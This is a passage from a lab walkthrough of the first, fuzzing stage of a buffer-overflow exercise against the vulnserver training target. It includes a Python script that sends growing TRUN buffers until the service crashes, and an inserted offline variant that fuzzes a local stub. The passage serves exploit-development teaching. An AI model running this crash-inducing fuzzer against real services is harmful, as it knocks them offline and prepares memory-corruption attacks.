Step 1: Fuzzing
Restart vulnserver by pressing Ctrl+F2 in Immunity Debugger and then run it by pressing F9. Run the fuzzer to crash the executable's TRUN command:
#!/usr/bin/python3
import sys, socket
from time import sleep

#--------Changeme--------#
host = "192.168.1.2"
port = 9999
#------------------------#

buffer = b"A" * 100   # start with 100 bytes and grow by 100 each round

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        payload = b"TRUN /.:/" + buffer
        print(f"[+] Sending the payload of length {len(buffer)}...")
        s.send(payload)
        s.close()
        sleep(1)
        buffer += b"A" * 100
    except:
        # buffer was already grown after the last successful send, so the
        # crash happened at a length below the one printed here
        print(f"Fuzzer crashed at {len(buffer)} bytes")
        sys.exit()
Here we should encode everything manually with b"" instead of using .encode(), since .encode() turns a byte into its Unicode representation.

After a while, vulnserver crashes:

Here we learn that the offset is less than 3000 bytes. We only want to know an approximate value in this step, and we will figure out the exact offset in the next step.
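The same grow-until-it-stops-answering loop as the script above, as an added example that is not part of the original page: it runs offline against a constructed stub standing in for vulnserver's TRUN handler (the stub, its CRASH_AT threshold and the helper names are assumptions) and returns both the last length that was answered and the first that was not, so the crash length is bounded from both sides instead of being read off the final print.

```python
import socket
import threading

TRUN = b"TRUN /.:/"
CRASH_AT = 2900   # constructed threshold for the stub, not a vulnserver value

def run_stub(srv, crash_at=CRASH_AT):
    """Stand-in for the TRUN handler: replies until the argument exceeds crash_at."""
    srv.settimeout(0.5)
    while True:
        try:
            conn, _ = srv.accept()
        except socket.timeout:
            continue
        except OSError:            # listening socket closed by demo()
            return
        with conn:
            data = b""
            while chunk := conn.recv(8192):   # read to EOF; the client half-closes
                data += chunk
            if data.startswith(TRUN) and len(data) - len(TRUN) > crash_at:
                srv.close()        # simulate the service dying
                return
            conn.sendall(b"TRUN COMPLETE\n")

def fuzz_trun(host, port, step=100, limit=5000, timeout=2.0):
    """Grow the TRUN argument by `step` bytes per request until the service stops
    answering. Returns (last_ok, first_fail): the crash length lies in (last_ok, first_fail]."""
    last_ok, length = 0, step
    while length <= limit:
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(TRUN + b"A" * length)
                s.shutdown(socket.SHUT_WR)
                if not s.recv(1024):   # peer closed without replying
                    return last_ok, length
        except OSError:                # refused, reset or timed out
            return last_ok, length
        last_ok, length = length, length + step
    return last_ok, None               # no crash up to `limit`

def demo(crash_at=CRASH_AT, step=100):
    """Run the fuzzer against the stub on a random loopback port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    threading.Thread(target=run_stub, args=(srv, crash_at), daemon=True).start()
    result = fuzz_trun("127.0.0.1", srv.getsockname()[1], step=step)
    srv.close()
    return result
```

Calling demo() yields (2900, 3000) for the stub's threshold, which is the "less than 3000" bound the page reads off its own fuzzer.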